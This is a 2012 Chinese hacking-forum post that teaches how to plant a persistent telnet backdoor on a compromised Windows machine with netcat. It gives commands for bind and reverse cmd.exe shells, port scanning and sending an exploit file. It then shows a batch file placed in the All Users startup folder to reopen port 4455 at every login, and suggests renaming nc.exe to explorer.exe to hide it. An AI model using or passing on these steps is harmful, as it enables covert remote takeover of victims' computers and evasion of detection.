设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
安全
安全
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
综合交流
›
网络攻防
›
利用nc构建telnet后门控制
返回列表
发新帖
利用nc构建telnet后门控制
[复制链接]
1722
|
1
|
2012-4-1 19:28:57
|
显示全部楼层
|
阅读模式
nc俗称为网络中的“瑞士军刀”其功能强大,如果在肉鸡上运行“nc.exe–pport–L–d–ecmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法:
(1)连接到REMOTE主机,格式:nc-nvv192.168.x.x80,表示连到192.168.x.x的TCP80端口
(2)监听LOCAL主机,格式:nc-l-p80,表示监听本机的TCP80端口
(3)扫描远程主机,格式:nc-nvv-w2-z192.168.x.x80-445,表示扫描192.168.x.x的TCP80到TCP445的所有端口
(4)REMOTE主机绑定SHELL,格式:nc-l-p5354-t-ec:\winnt\system32\cmd.exe,表示绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
(5)REMOTE主机绑定SHELL并反向连接,格式:nc-t-ec:\winnt\system32\cmd.exe192.168.x.x5354讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口。
(6)作攻击程序用,格式:
type.exec:\exploit.txt|nc-nvv192.168.x.x80
nc-nvv192.168.x.x80
连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'的内容
(7)作蜜罐用,格式:nc-L-p80讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止;格式:nc-L-p80>c:\log.txt讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把'>'改为'>>'即可以追加日志附:'c:\log.txt'为日志等
下面主要介绍如何通过nc批处理命令来构建一个telnet类型的后门:
1.编辑一个bat文件。
在IP地址为192.168.1.19的计算机上新建一个bat文件,取名为“1.bat”,在其中输入以下内容。
@
@start
@c:\nc.exe–p4455–L–d–ecmd.exe
@exit
ecmd.exe
图1构建一个bat文件
2.将1.bat复制到“Alluser”的启动文件夹。
将“1.bat”文件复制到“C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动”文件夹下,2所示。
「开始」菜单
图2复制1.bat文件到启动文件夹下
3.等待重启后使用telnet连接肉鸡ip。
重启计算机后,用户进入计算机后,会执行“1.bat”脚本,会启动nc程序从而开启4455端口。在本地使用命令“telnet192.168.1.194455”连接IP地址192.168.1.19的计算机的4455端口,3所示,可以通过telnet连接肉鸡并在肉鸡上执行各种命令。
4455端口
图3使用telnet连接肉鸡4455端口
技巧:可以将nc.exe文件重新命名为其他文件,例如explorer.exe等,这样在任务管理器中看到的nc.exe变成了explorer.exe了,不容易被发觉,而nc命令中加入“-L-d”后即使关闭了nc监听窗口,该命令行还继续存在。
小结:本案例通过编写bat批处理文件,并将该bat文件放入“C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动”文件夹下,则无论那个用户登陆,都会启动该bat文件,从而保留nc的telnet后门,该后门只要知道端口,通过telnet程序可以直接连接。
主机
,
黑客
,
程序
相关帖子
•
网络入侵证据的收集分析
•
网络嗅探ARP欺骗攻击之Cain使用教程
•
网络安全威胁之IP欺骗攻击法
•
Movavi VideoSuite 8.0 Slideshow - '.jpg' Local Crash (PoC)
•
入侵扫描嗅探的思路
•
网络入侵大型网站的完整思路
•
3K引擎配套工具12.04.04版【支持:wil,wzl格式】
•
3k引擎2012.04.04(beta2)版
•
求助,SKY登陆器配置好自动更新,下载完成不自动解压?
•
2012-05-26最新更新GM2引擎,完全兼容herom2引擎。
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
飞舞的头发
|
2012-6-10 09:16:46
|
显示全部楼层
文章中说的很不错啊
回复
支持
反对
使用道具
举报
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
Heg
回复楼主
返回列表
茶余饭后
网络攻防
旧帖回收
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)